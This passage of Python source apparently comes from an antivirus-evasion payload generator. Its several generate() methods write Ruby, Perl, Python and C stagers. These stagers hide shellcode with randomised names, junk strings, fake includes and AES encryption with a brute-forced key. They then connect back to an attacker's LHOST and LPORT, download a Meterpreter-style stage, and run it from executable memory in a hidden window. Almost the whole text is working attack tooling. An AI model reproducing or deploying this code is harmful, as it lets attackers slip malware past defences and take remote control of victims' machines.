ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (%s, &ServiceStatus);
return;
case SERVICE_CONTROL_SHUTDOWN:
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
SetServiceStatus (%s, &ServiceStatus);
return;
default:
break;
}
SetServiceStatus (%s, &ServiceStatus);
return;
}
""" % (hStatusName, hStatusName, hStatusName)
self.payload_source_code = code
return
def generate(self):
payload_code = "require 'rubygems';require 'win32/api';require 'socket';include Win32\n"
# Add logic for adding this line, stupid bug and I have no idea
# why this is even a problem, but ruby is dumb
if self.required_options["HOSTNAME"][0] != "X" or self.required_options[
"DOMAIN"][0] != "X" or self.required_options["USERNAME"][
0] != "X" or self.required_options["SLEEP"][0] != "X":
pass
else:
payload_code += "exit if Object.const_defined?(:Ocra)\n"
if self.required_options["HOSTNAME"][
0] != "X" or self.required_options["DOMAIN"][0] != "X":
payload_code += 'require \'socket\'\n'
payload_code2, num_ends_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# randomly generate out variable names
payloadName = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
threadName = evasion_helpers.randomString()
valloc_random = evasion_helpers.randomString()
rtlmove_random = evasion_helpers.randomString()
createthread_random = evasion_helpers.randomString()
waitfor_random = evasion_helpers.randomString()
heapcreate_random = evasion_helpers.randomString()
heapalloc_random = evasion_helpers.randomString()
heap_name = evasion_helpers.randomString()
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "$" + valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "$" + heapcreate_random + " = API.new('HeapCreate', 'III', 'I');$" + heapalloc_random + " = API.new('HeapAlloc', 'III', 'I');$" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');$" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');$" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I')\n"
payload_code += "$g_o = API.new('_get_osfhandle', 'I', 'I', 'msvcrt.dll')\n"
payload_code += "def g(ip,port)\n"
payload_code += "\tbegin\n"
payload_code += "\t\ts = TCPSocket.open(ip, port)\n"
payload_code += "\t\tpl = Integer(s.recv(4).unpack('L')[0])\n"
payload_code += "\t\tp = \" \"\n"
payload_code += "\t\twhile p.length < pl\n\t\tp += s.recv(pl) end\n"
payload_code += "\t\tp[0] = ['BF'].pack(\"H*\")\n"
payload_code += "\t\tsd = $g_o.call(s.fileno)\n"
payload_code += "\t\tfor i in 1..4\n\t\t\tp[i] = Array(sd).pack('V')[i-1] end\n"
payload_code += "\t\treturn p\n"
payload_code += "\trescue\n\treturn \"\"\n\tend\nend\n"
payload_code += "def ij(sc)\n"
payload_code += "\tif sc.length > 1000\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += "\t\tpt = $" + valloc_random + ".call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
payload_code += "\t\tx = $" + rtlmove_random + ".call(pt,sc,sc.length)\n"
payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,pt,0,0,0),0xFFFFFFF)\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
payload_code += "\t\t$" + heap_name + " = $" + heapcreate_random + ".call(0x0004,(sc.length > 0x1000 ? sc.length : 0x1000), 0)\n"
payload_code += "\t\t$" + ptrName + " = $" + heapalloc_random + ".call($" + heap_name + ", 0x00000008, sc.length)\n"
payload_code += "\t\tx = $" + rtlmove_random + ".call($" + ptrName + ",sc,sc.length)\n"
payload_code += "\t\tx = $" + waitfor_random + ".call($" + createthread_random + ".call(0,0,$" + ptrName + ",0,0,0),0xFFFFFFF)\n"
payload_code += "\tend\nend\n"
payload_code += "ij(g(\"%s\",%s))\n" % (
self.required_options["LHOST"][0],
self.required_options["LPORT"][0])
# Close out all the if statements
for iteration in range(num_ends_required):
payload_code += 'end\n'
self.payload_source_code = payload_code
return
def generate(self):
# How I'm tracking the number of nested tabs needed
# to make the payload
num_ends_required = 0
payload_code = "use Win32::API;\n"
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ""
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
payload_code2, num_ends_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# randomly generate variable names
shellcode_variable = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
rand_valloc = evasion_helpers.randomString()
rand_movemem = evasion_helpers.randomString()
rand_cthread = evasion_helpers.randomString()
rand_waitfor = evasion_helpers.randomString()
rand_heapcreate = evasion_helpers.randomString()
rand_heapalloc = evasion_helpers.randomString()
rand_thread = evasion_helpers.randomString()
rand_protect = evasion_helpers.randomString()
protect_out = evasion_helpers.randomString()
payload_code += '\t' * num_ends_required + "my $%s = \"%s\";\n" % (shellcode_variable, Shellcode)
payload_code += '\t' * num_ends_required + "$" + rand_movemem + " = new Win32::API('kernel32', 'RtlMoveMemory', 'IPI', 'V');\n"
payload_code += '\t' * num_ends_required + "$" + rand_cthread + " = new Win32::API('kernel32', 'CreateThread', 'IIIIIP', 'I');\n"
payload_code += '\t' * num_ends_required + "$" + rand_waitfor + " = new Win32::API('kernel32', 'WaitForSingleObject', 'II', 'I');\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_ends_required + "$" + rand_valloc + " = new Win32::API('kernel32', 'VirtualAlloc', 'IIII', 'I');\n"
payload_code += '\t' * num_ends_required + "$" + rand_protect + " = new Win32::API('kernel32', 'VirtualProtect', 'PIIP', 'I');\n"
payload_code += '\t' * num_ends_required + "my $" + ptrName + " = $" + rand_valloc + "->Call(0, length($" + shellcode_variable + "), 0x1000, 0x04);\n"
payload_code += '\t' * num_ends_required + "$" + rand_movemem + "->Call($%s, $%s, length($%s));\n" % (ptrName, shellcode_variable, shellcode_variable)
payload_code += '\t' * num_ends_required + "my $" + protect_out + " = $" + rand_protect + "->Call(" + ptrName + ", length($" + shellcode_variable + "), 0x20, 0);\n"
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
rand_heapcrout = evasion_helpers.randomString()
payload_code += '\t' * num_ends_required + "$" + rand_heapcreate + " = new Win32::API('kernel32', 'HeapCreate', 'III', 'I');\n"
payload_code += '\t' * num_ends_required + "$" + rand_heapalloc + " = new Win32::API('kernel32', 'HeapAlloc', 'III', 'I');\n"
payload_code += '\t' * num_ends_required + "my $" + rand_heapcrout + " = $" + rand_heapcreate + "->Call(0x00040000, length(" + shellcode_variable + ")*2, 0);\n"
payload_code += '\t' * num_ends_required + "my $" + ptrName + " = $" + rand_heapalloc + "->Call($" + rand_heapcrout + ", 0x00000008, length(" + shellcode_variable + "));\n"
payload_code += '\t' * num_ends_required + "$" + rand_movemem + "->Call($%s, $%s, length($%s));\n" % (ptrName, shellcode_variable, shellcode_variable)
payload_code += '\t' * num_ends_required + "my $" + rand_thread + " = $" + rand_cthread + "->Call(0, 0, $%s, 0, 0, 0);\n" % (ptrName)
payload_code += '\t' * num_ends_required + "$" + rand_waitfor + "->Call($" + rand_thread + ", -1);\n"
payload_code += '}\n' * num_ends_required
self.payload_source_code = payload_code
return
def generate(self):
sumMethodName = evasion_helpers.randomString()
checkinMethodName = evasion_helpers.randomString()
randLettersName = evasion_helpers.randomString()
randLetterSubName = evasion_helpers.randomString()
randBaseName = evasion_helpers.randomString()
downloadMethodName = evasion_helpers.randomString()
hostName = evasion_helpers.randomString()
portName = evasion_helpers.randomString()
requestName = evasion_helpers.randomString()
tName = evasion_helpers.randomString()
injectMethodName = evasion_helpers.randomString()
dataName = evasion_helpers.randomString()
byteArrayName = evasion_helpers.randomString()
ptrName = evasion_helpers.randomString()
bufName = evasion_helpers.randomString()
handleName = evasion_helpers.randomString()
data2Name = evasion_helpers.randomString()
proxy_var = evasion_helpers.randomString()
opener_var = evasion_helpers.randomString()
randctypes = evasion_helpers.randomString()
payload_code = "import urllib.request, string, random, ctypes as " + randctypes + "\n"
# How I'm tracking the number of nested tabs needed
# to make the payload
num_tabs_required = 0
payload_code2, num_tabs_required = gamemaker.senecas_games(self)
payload_code = payload_code + payload_code2
# helper method that returns the sum of all ord values in a string % 0x100
payload_code += '\t' * num_tabs_required + "def " + sumMethodName + "(s): return sum([ord(ch) for ch in s]) % 0x100\n"
# method that generates a new checksum value for checkin to the meterpreter handler
payload_code += '\t' * num_tabs_required + "def " + checkinMethodName + "():\n\tfor x in range(64):\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randBaseName + " = ''.join(random.sample(string.ascii_letters + string.digits,3))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randLettersName + " = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n"
payload_code += '\t' * num_tabs_required + "\t\tfor " + randLetterSubName + " in " + randLettersName + ":\n"
payload_code += '\t' * num_tabs_required + "\t\t\tif " + sumMethodName + "(" + randBaseName + " + " + randLetterSubName + ") == 92: return " + randBaseName + " + " + randLetterSubName + "\n"
# method that connects to a host/port over http and downloads the hosted data
payload_code += '\t' * num_tabs_required + "def " + downloadMethodName + "(" + hostName + ", " + portName + "):\n"
payload_code += '\t' * num_tabs_required + "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n"
payload_code += '\t' * num_tabs_required + "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n"
payload_code += '\t' * num_tabs_required + "\turllib.request.install_opener(" + opener_var + ")\n"
payload_code += '\t' * num_tabs_required + "\t" + requestName + " = urllib.request.Request(\"http://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n"
payload_code += '\t' * num_tabs_required + "\ttry:\n"
payload_code += '\t' * num_tabs_required + "\t\t" + tName + " = urllib.request.urlopen(" + requestName + ")\n"
payload_code += '\t' * num_tabs_required + "\t\ttry:\n"
payload_code += '\t' * num_tabs_required + "\t\t\tif int(" + tName + ".info()[\"Content-Length\"]) > 100000: return " + tName + ".read()\n"
payload_code += '\t' * num_tabs_required + "\t\t\telse: return ''\n"
payload_code += '\t' * num_tabs_required + "\t\texcept: return " + tName + ".read()\n"
payload_code += '\t' * num_tabs_required + "\texcept urllib.request.URLError:\n"
payload_code += '\t' * num_tabs_required + "\t\treturn ''\n"
# method to inject a reflective .dll into memory
payload_code += '\t' * num_tabs_required + "def " + injectMethodName + "(" + dataName + "):\n"
payload_code += '\t' * num_tabs_required + "\tif " + dataName + " != \"\":\n"
payload_code += '\t' * num_tabs_required + "\t\t" + byteArrayName + " = bytearray(" + dataName + ")\n"
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n"
# Assuming heap injection
else:
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
# download the metpreter .dll and inject it
payload_code += '\t' * num_tabs_required + data2Name + " = ''\n"
payload_code += '\t' * num_tabs_required + data2Name + " = " + downloadMethodName + "(\"" + self.required_options["LHOST"][0] + "\", " + str(self.required_options["LPORT"][0]) + ")\n"
payload_code += '\t' * num_tabs_required + injectMethodName + "(" + data2Name + ")\n"
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
# Generate the variable names
randctypes = evasion_helpers.randomString()
ShellcodeVariableName = evasion_helpers.randomString()
rand_ptr = evasion_helpers.randomString()
rand_ht = evasion_helpers.randomString()
known_plaintext_string = evasion_helpers.randomString()
key_guess = evasion_helpers.randomString()
secret_key = evasion_helpers.randomString()
small_constrained_key_variable = evasion_helpers.randomString()
decoded_ciphertext = evasion_helpers.randomString()
decoded_known = evasion_helpers.randomString()
decoded_shellcode = evasion_helpers.randomString()
RandCipherObject = evasion_helpers.randomString()
RandPadding = evasion_helpers.randomString()
rand_virtual_protect = evasion_helpers.randomString()
# Generate the shellcode
if not self.cli_shellcode:
Shellcode = self.shellcode.generate(self.cli_opts)
if self.shellcode.msfvenompayload:
self.payload_type = self.shellcode.msfvenompayload
elif self.shellcode.payload_choice:
self.payload_type = self.shellcode.payload_choice
self.shellcode.payload_choice = ''
# assume custom shellcode
else:
self.payload_type = 'custom'
else:
Shellcode = self.cli_shellcode
payload_code, num_tabs_required = gamemaker.senecas_games(self)
# encrypt the shellcode and get our randomized key
encoded_ciphertext, constrained_key, encryption_key = encryption.constrained_aes(Shellcode)
encoded_ciphertext = encoded_ciphertext.decode('ascii')
# Use the secret we received earlier to encrypt our known plaintext string
encrypted_plaintext_string = encryption.known_plaintext(encryption_key, known_plaintext_string)
encrypted_plaintext_string = encrypted_plaintext_string.decode('ascii')
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# Create Payload code
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import os\n'
payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n'
payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n'
payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n'
payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \"" + constrained_key + '\" + str(' + key_guess + ')\n'
payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(' + secret_key + ', AES.MODE_ECB)\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n'
payload_code += '\t' * num_tabs_required + '\ttry:\n'
payload_code += '\t' * num_tabs_required + '\t\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n'
payload_code += '\t' * num_tabs_required + '\t\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + '\t\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n'
payload_code += '\t' * num_tabs_required + '\t\t\t' + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
payload_code += '\t' * num_tabs_required + '\t\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + '\t\t\t' + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
payload_code += '\t' * num_tabs_required + '\t\t\t' + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + '\t\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
payload_code += '\t' * num_tabs_required + '\texcept:\n'
payload_code += '\t' * num_tabs_required + '\t\tpass'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
HeapVar = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import os\n'
payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n'
payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n'
payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n'
payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \'" + constrained_key + '\' + str(' + key_guess + ')\n'
payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(' + encryption_key + ', AES.MODE_ECB)\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n'
payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n'
payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n'
payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n'
payload_code += '\t' * num_tabs_required + '\t\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
def generate(self):
winsock_init_name = evasion_helpers.randomString()
punt_name = evasion_helpers.randomString()
recv_all_name = evasion_helpers.randomString()
wsconnect_name = evasion_helpers.randomString()
# the real includes needed
includes = [
"#include <stdio.h>", "#include <stdlib.h>",
"#include <windows.h>", "#include <string.h>"
]
# max length string for obfuscation
global_max_string_length = 10000
max_string_length = random.randint(100, global_max_string_length)
max_num_strings = 10000
# TODO: add in more string processing functions
randName1 = evasion_helpers.randomString() # reverse()
randName2 = evasion_helpers.randomString() # doubles characters
stringModFunctions = [
(randName1,
"char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }"
% (randName1)),
(randName2,
"char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }"
% (randName2))
]
random.shuffle(stringModFunctions)
# obfuscation "logical nop" string generation functions
randString1 = evasion_helpers.randomString(50)
randName1 = evasion_helpers.randomString()
randVar1 = evasion_helpers.randomString()
randName2 = evasion_helpers.randomString()
randVar2 = evasion_helpers.randomString()
randVar3 = evasion_helpers.randomString()
randName3 = evasion_helpers.randomString()
randVar4 = evasion_helpers.randomString()
randVar5 = evasion_helpers.randomString()
stringGenFunctions = [
(randName1,
"char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}"
% (randName1, randVar1, stringModFunctions[0][0], randString1,
randVar1, randString1[25])),
(randName2,
"char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }"
% (randName2, randVar2, max_string_length, randVar3,
max_string_length, randVar2, evasion_helpers.randomString(50),
randVar3, evasion_helpers.randomString(50),
stringModFunctions[1][0], randVar2, randVar3)),
(randName3,
"char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }"
%
(randName3, randVar4, max_string_length,
evasion_helpers.randomString(50), randVar5, randVar4, randVar5))
]
random.shuffle(stringGenFunctions)
# obfuscation - add in our fake includes
fake_includes = [
"#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>",
"#include <signal.h>", "#include <stdarg.h>",
"#include <limits.h>", "#include <assert.h>"
]
for x in range(1, random.randint(1, 7)):
includes.append(fake_includes[x])
# shuffle up real/fake includes
random.shuffle(includes)
code = "#define _WIN32_WINNT 0x0500\n"
code += "#include <winsock2.h>\n"
code += "\n".join(includes) + "\n"
#string mod functions
code += stringModFunctions[0][1] + "\n"
code += stringModFunctions[1][1] + "\n"
# build the winsock_init function
wVersionRequested_name = evasion_helpers.randomString()
wsaData_name = evasion_helpers.randomString()
code += "void %s() {" % (winsock_init_name)
code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (
wVersionRequested_name, evasion_helpers.obfuscateNum(
2, 4), evasion_helpers.obfuscateNum(2, 4), wsaData_name)
code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" % (
wVersionRequested_name, wsaData_name)
# first logical nop string function
code += stringGenFunctions[0][1] + "\n"
# build punt function
my_socket_name = evasion_helpers.randomString()
code += "void %s(SOCKET %s) {" % (punt_name, my_socket_name)
code += "closesocket(%s);" % (my_socket_name)
code += "WSACleanup();"
code += "exit(1);}\n"
# second logical nop string function
code += stringGenFunctions[1][1] + "\n"
# build recv_all function
my_socket_name = evasion_helpers.randomString()
buffer_name = evasion_helpers.randomString()
len_name = evasion_helpers.randomString()
code += "int %s(SOCKET %s, void * %s, int %s){" % (
recv_all_name, my_socket_name, buffer_name, len_name)
code += "int slfkmklsDSA=0;int rcAmwSVM=0;"
code += "void * startb = %s;" % (buffer_name)
code += "while (rcAmwSVM < %s) {" % (len_name)
code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" % (
my_socket_name, len_name)
code += "startb += slfkmklsDSA; rcAmwSVM += slfkmklsDSA;"
code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" % (
punt_name, my_socket_name)
# third logical nop string function
code += stringGenFunctions[2][1] + "\n"
# build wsconnect function
target_name = evasion_helpers.randomString()
sock_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (
wsconnect_name, target_name, sock_name, my_socket_name)
code += "%s = socket(AF_INET, SOCK_STREAM, 0);" % (my_socket_name)
code += "if (%s == INVALID_SOCKET) %s(%s);" % (
my_socket_name, punt_name, my_socket_name)
code += "%s = gethostbyname(\"%s\");" % (
target_name, self.required_options["LHOST"][0])
code += "if (%s == NULL) %s(%s);" % (target_name, punt_name,
my_socket_name)
code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" % (
sock_name, target_name, target_name)
code += "%s.sin_family = AF_INET;" % (sock_name)
code += "%s.sin_port = htons(%s);" % (
sock_name,
evasion_helpers.obfuscateNum(
int(self.required_options["LPORT"][0]), 32))
code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" % (
my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
code += "return %s;}\n" % (my_socket_name)
# build main() code
size_name = evasion_helpers.randomString()
buffer_name = evasion_helpers.randomString()
function_name = evasion_helpers.randomString()
my_socket_name = evasion_helpers.randomString()
count_name = evasion_helpers.randomString()
# obfuscation stuff
char_array_name_1 = evasion_helpers.randomString()
number_of_strings_1 = random.randint(1, max_num_strings)
char_array_name_2 = evasion_helpers.randomString()
number_of_strings_2 = random.randint(1, max_num_strings)
char_array_name_3 = evasion_helpers.randomString()
number_of_strings_3 = random.randint(1, max_num_strings)
code += "int main(int argc, char * argv[]) {"
code += "ShowWindow( GetConsoleWindow(), SW_HIDE );"
code += "ULONG32 %s;" % (size_name)
code += "char * %s;" % (buffer_name)
code += "int i;"
code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
code += "void (*%s)();" % (function_name)
# malloc our first string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" % (
number_of_strings_1, char_array_name_1,
random.randint(max_string_length, global_max_string_length))
code += "%s();" % (winsock_init_name)
code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
code += "SOCKET %s = %s();" % (my_socket_name, wsconnect_name)
# malloc our second string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" % (
number_of_strings_2, char_array_name_2,
random.randint(max_string_length, global_max_string_length))
code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (
count_name, my_socket_name, size_name,
evasion_helpers.obfuscateNum(4, 2))
code += "if (%s != %s || %s <= 0) %s(%s);" % (
count_name, evasion_helpers.obfuscateNum(
4, 2), size_name, punt_name, my_socket_name)
code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" % (
buffer_name, size_name, evasion_helpers.obfuscateNum(5, 2))
code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
# first string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
# real code
code += "if (%s == NULL) %s(%s);" % (buffer_name, punt_name,
my_socket_name)
code += "%s[0] = 0xBF;" % (buffer_name)
code += "memcpy(%s + 1, &%s, %s);" % (
buffer_name, my_socket_name, evasion_helpers.obfuscateNum(4, 2))
# malloc our third string obfuscation array
code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" % (
number_of_strings_3, char_array_name_3,
random.randint(max_string_length, global_max_string_length))
# second string obfuscation method
code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" % (
